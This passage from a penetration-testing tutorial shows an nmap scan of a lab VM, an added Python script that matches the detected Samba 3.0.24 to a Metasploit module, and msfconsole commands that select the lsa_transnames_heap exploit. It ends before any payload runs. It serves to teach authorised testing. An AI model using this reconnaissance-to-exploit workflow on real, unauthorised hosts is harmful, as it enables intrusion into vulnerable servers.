
The Joy of Exploitation


Starting Nmap 5.20 ( http://nmap.org ) at 2011-03-15 19:35 EDT
Warning: Traceroute does not support idle or connect scan, disabling...
Nmap scan report for 192.168.33.132
Host is up (0.00048s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE     VERSION
80/tcp  open  http        Apache httpd 2.2.3 ((Ubuntu) PHP/5.2.1)
|_html-title: Index of /
139/tcp open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
445/tcp open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
MAC Address: 00:0C:29:21:AD:08 (VMware)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).

. . . SNIP . . .

Host script results:
|_nbstat: NetBIOS name: UBUNTU, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-os-discovery:
|   OS: Unix (Samba 3.0.24)
|   Name: MSHOME\Unknown
|_  System time: 2011-03-15 17:39:57 UTC-4

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.11 seconds

We see three open ports: 80, 139, and 445. The version string on port 80 tells us that the system is running Ubuntu, and the banners on ports 139 and 445 tell us that it is running a version of Samba 3.x, alongside Apache 2.2.3 with PHP 5.2.1. The port banners only say "3.X"; the smb-os-discovery script result narrows that to Samba 3.0.24, and the exact release matters, because each Samba exploit module targets a specific range of versions.
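As an added example (not code from the book), here is a small Python script that automates the step just described: it parses nmap's normal output for the open ports and their version strings, takes the exact Samba release from the smb-os-discovery result rather than the "3.X" port banner, and maps it to a candidate Metasploit module. The input is the scan output above, embedded as a constructed string; the version cut-off for lsa_transnames_heap is an assumption taken from the CVE-2007-2446 advisory (Samba 3.0.0 through 3.0.25rc3), not from the page.

```python
import re

# Constructed sample: the scan output quoted above, trimmed to the lines the
# parser uses (hypothetical input for this example, not a fresh scan).
SCAN = """\
Nmap scan report for 192.168.33.132
Host is up (0.00048s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE     VERSION
80/tcp  open  http        Apache httpd 2.2.3 ((Ubuntu) PHP/5.2.1)
|_html-title: Index of /
139/tcp open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
445/tcp open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
MAC Address: 00:0C:29:21:AD:08 (VMware)

Host script results:
|_nbstat: NetBIOS name: UBUNTU, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-os-discovery:
|   OS: Unix (Samba 3.0.24)
|   Name: MSHOME\\Unknown
|_  System time: 2011-03-15 17:39:57 UTC-4
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
SAMBA_RE = re.compile(r"Samba (\d+)\.(\d+)\.(\d+)")

# Assumption, not from the page: CVE-2007-2446 (the lsa_io_trans_names heap
# overflow) affects Samba 3.0.0 through 3.0.25rc3. Release candidates are
# ignored here, so 3.0.24 is treated as the last affected release.
LSA_TRANSNAMES_MAX = (3, 0, 24)


def parse_scan(text):
    """Map each host to its open ports and the exact Samba release, if any."""
    hosts, cur = {}, None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            cur = m.group(1)
            hosts[cur] = {"ports": [], "samba": None}
            continue
        if cur is None:
            continue
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            hosts[cur]["ports"].append({
                "port": int(port), "proto": proto, "state": state,
                "service": service, "version": version.strip(),
            })
            continue
        # The port banner only says "3.X"; smb-os-discovery carries the release.
        if line.startswith("|") and "OS:" in line:
            m = SAMBA_RE.search(line)
            if m:
                hosts[cur]["samba"] = tuple(int(x) for x in m.groups())
    return hosts


def candidate_modules(info):
    """Return the Metasploit modules worth trying against one parsed host."""
    mods = []
    samba = info.get("samba")
    if samba and samba[:2] == (3, 0) and samba <= LSA_TRANSNAMES_MAX:
        mods.append("exploit/linux/samba/lsa_transnames_heap")
    return mods


def triage(text):
    """host -> candidate modules, skipping hosts with nothing to suggest."""
    result = {}
    for host, info in parse_scan(text).items():
        mods = candidate_modules(info)
        if mods:
            result[host] = mods
    return result


if __name__ == "__main__":
    for host, mods in triage(SCAN).items():
        print(host, "->", ", ".join(mods))
```

Run as-is it reports the one host with its candidate module; for a real engagement, feed it the file written by `nmap -sV -sC -oN scan.txt`. The thing to notice is the mismatch the script handles: the port banner alone ("Samba smbd 3.X") is not enough to pick an exploit, and a host whose NSE result says 3.0.25 or later is deliberately left off the list.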

Let’s search for a Samba exploit and try it against the system:

msf > search samba
[*] Searching loaded modules for pattern 'samba'...

Auxiliary
=========
   Name                               Rank    Description
   ----                               ----    -----------
   admin/smb/samba_symlink_traversal  normal  Samba Symlink Directory Traversal
   dos/samba/lsa_addprivs_heap        normal  Samba lsa_io_privilege_set Heap Overflow
   dos/samba/lsa_transnames_heap      normal  Samba lsa_io_trans_names Heap Overflow

Exploits
========
   Name                                 Rank       Description
   ----                                 ----       -----------
   linux/samba/lsa_transnames_heap      good       Samba lsa_io_trans_names . . .

. . . SNIP . . .

msf > use linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) > show payloads